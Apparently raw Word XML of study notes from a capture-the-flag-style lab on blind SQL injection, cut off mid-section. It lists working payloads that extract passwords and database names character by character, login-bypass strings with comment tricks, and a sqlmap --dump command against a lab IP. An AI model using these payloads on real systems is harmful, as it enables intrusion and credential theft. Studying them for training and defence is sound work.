    <w:p w14:paraId="463D1B13" w14:textId="3A6A7371" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00931AAA">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>(SELECT password FROM users LIMIT 0,1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB8BB2" w14:textId="3C6638E5" w:rsidR="00931AAA" w:rsidRDefault="00931AAA" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>LIMIT clause is used to limit amount of data returned by</w:t>
      </w:r>
      <w:r w:rsidR="00084622">
        <w:t xml:space="preserve"> SELECT statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A1819C" w14:textId="0F0B3015" w:rsidR="00084622" w:rsidRDefault="00084622" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first number is offset and second number is limit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B40467C" w14:textId="7713B1EF" w:rsidR="00084622" w:rsidRDefault="00084622" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>syntax – LIMIT &lt;OFFSET&gt;,&lt;LIMIT&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B1708E3" w14:textId="654E4B29" w:rsidR="00084622" w:rsidRDefault="00084622" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL query to return first character of a specific password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A64561" w14:textId="67C7CD16" w:rsidR="00084622" w:rsidRDefault="00084622" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SUBSTR((SELECT password FROM users LIMIT &lt;OFFSET&gt;, &lt;LIMIT&gt;),&lt;start&gt;,&lt;length&gt;)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60624EDF" w14:textId="753AB55F" w:rsidR="00084622" w:rsidRDefault="00084622" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Compare characters of password to guessed value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684CEEA7" w14:textId="0DA7A1B7" w:rsidR="00084622" w:rsidRDefault="00084622" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SUBSTR((SELECT password FROM users LIMIT &lt;OFFSET&gt;, &lt;LIMIT&gt;),&lt;start&gt;,&lt;length&gt;) = ‘&lt;VALUE&gt;’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F39B61" w14:textId="2303CE32" w:rsidR="00084622" w:rsidRDefault="00084622" w:rsidP="00084622">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Sometimes input handling changes all input to a set form (T changed to t)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640A192C" w14:textId="4C248DDC" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>counter with hex representation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3162FDE0" w14:textId="22EA36DB" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>substitute value X and SQLites CAST expression to convert value to datatype the database expects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E472EBA" w14:textId="7FFA5353" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SUBSTR((SELECT password FROM users LIMIT &lt;OFFSET&gt;,&lt;LIMIT&gt;),&lt;start&gt;,&lt;length&gt;) = CAST(X’&lt;ASCII VALUE OF LETTER&gt; as Text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415B8BBE" w14:textId="12D57A72" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>To make query fit into original query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C71B31" w14:textId="31A45676" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>close parameter by adding a single quote (‘) and append an AND operator to add condition to it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0895B434" w14:textId="6AAF6E4D" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>then append two dashes (--) to comment out password check at end of query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67275EAE" w14:textId="0E724A10" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="000C5E94">
        <w:t>admin' AND SUBSTR((SELECT password FROM users LIMIT 0,1),1,1) = CAST(X'54' as Text)-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518FFDC3" w14:textId="4FAE3F96" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>302 redirect means correct character has been found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACA3B9A" w14:textId="4A709038" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Scripting this process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B598C3C" w14:textId="52087827" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>loop over every possible ASCII character</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F65E50" w14:textId="3B2C41F2" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>not efficient and generates a lot of traffic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEABCC7" w14:textId="14E8DF4F" w:rsidR="000C5E94" w:rsidRDefault="000C5E94" w:rsidP="000C5E94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ASCII</w:t>
      </w:r>
      <w:r w:rsidR="006A486C">
        <w:t>Loop.py, change password_len variable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44CB96EA" w14:textId="30C60F1F" w:rsidR="006A486C" w:rsidRDefault="006A486C" w:rsidP="006A486C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>length of password can be found by asking database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393EE1C4" w14:textId="2A16F597" w:rsidR="006A486C" w:rsidRDefault="006A486C" w:rsidP="006A486C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="006A486C">
        <w:t>admin' AND length((SELECT password from users where username='admin'))==37-- -</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD8618B" w14:textId="1139AA71" w:rsidR="006A486C" w:rsidRDefault="006A486C" w:rsidP="006A486C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Using sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4C6DBE" w14:textId="066106A0" w:rsidR="006A486C" w:rsidRDefault="006A486C" w:rsidP="006A486C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. sqlmap -u http://10.10.250.164:5000/challenge3/login --data="username=admin&amp;password=admin" --level=5 --risk=3 --dbms=sqlite --technique=b –dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F416EA" w14:textId="76FADD9C" w:rsidR="006A486C" w:rsidRDefault="006A486C" w:rsidP="006A486C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>syntax. sqlmap -u &lt;url/path&gt; --data=”username=admin$password=admin” –level=5 –risk=3 –dbms=sqlite –technique=b --dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192CE226" w14:textId="63F1FDE3" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A5E3B3" w14:textId="48EFB626" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>game of yes-no with database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2BB69C" w14:textId="3A473A13" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ask questions about database length and table quantity to dump and enumerate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598BC6FD" w14:textId="012FEED2" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>use =, &lt;, &gt; to compare values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E99DB8" w14:textId="66088C0A" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>id=1’ OR 1 &lt; 2 - -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F15025" w14:textId="57097263" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>id=1’ OR 1 &gt; 2 - -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207617DC" w14:textId="022F797C" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>can assist in asking Y/N questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72544AB5" w14:textId="2BBA467C" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SUBSTR() function extracts substring from a string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242ED5EB" w14:textId="1F50944A" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Three input values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7155A8BB" w14:textId="1FA24D03" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Operated Text (database name)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30713CF0" w14:textId="4DBCA871" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Character to Start With</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5996DB9A" w14:textId="782080BC" w:rsidR="005A3838" w:rsidRDefault="005A3838" w:rsidP="005A3838">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Number of Characters to Extract</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F794C0" w14:textId="51426125" w:rsidR="00273AF5" w:rsidRDefault="00273AF5" w:rsidP="00273AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. SELECT SUBSTR(“Strange Fox”, 5, 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A95BA54" w14:textId="5D384C24" w:rsidR="00273AF5" w:rsidRDefault="00273AF5" w:rsidP="00273AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>payload – AND (substr((select database()),1,1))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CDDB71" w14:textId="1148CAE4" w:rsidR="00273AF5" w:rsidRDefault="00273AF5" w:rsidP="00273AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>first character of database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C3956" w14:textId="11C6DBA3" w:rsidR="00273AF5" w:rsidRDefault="00273AF5" w:rsidP="00273AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>add “= &lt;letter of choice&gt; - -+” to end of line above</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8EEA39" w14:textId="682802F6" w:rsidR="00273AF5" w:rsidRDefault="00273AF5" w:rsidP="00273AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to prevent fuzzing entire alphabet, use ASCII to compare values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62068583" w14:textId="14E4BE9B" w:rsidR="00273AF5" w:rsidRDefault="00273AF5" w:rsidP="00273AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>ex. id=1’ AND (ascii(substr((select database()),1,1))) = 115 - -+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2670F13D" w14:textId="0F671DC5" w:rsidR="00273AF5" w:rsidRDefault="00273AF5" w:rsidP="00273AF5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Note: ascii function before substr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01EDD9CC" w14:textId="6DF6BFF7" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="6"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Need to use &lt; and &gt; operators to compare value of characters to their ASCII values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2F5A1D" w14:textId="688D6FBF" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="7"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ex. </w:t>
      </w:r>
      <w:r w:rsidRPr="007C551D">
        <w:t>?id=1' AND (ascii(substr((select database()),2,1))) &lt; 115 --+</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1504CEC7" w14:textId="30F91377" w:rsidR="007C551D" w:rsidRDefault="007C551D" w:rsidP="007C551D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="8"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>compares second letter of database name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E6C86C8" w14:textId="7BB259ED" w:rsidR="0075754B" w:rsidRDefault="0075754B" w:rsidP="0075754B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>SQL Injection Attack on an UPDATE Statement</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0430DD80" w14:textId="619BFBD4" w:rsidR="0075754B" w:rsidRDefault="0075754B" w:rsidP="0075754B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>allows users to change records within a database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3818D13A" w14:textId="395F6E75" w:rsidR="0075754B" w:rsidRDefault="0066428C" w:rsidP="0075754B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
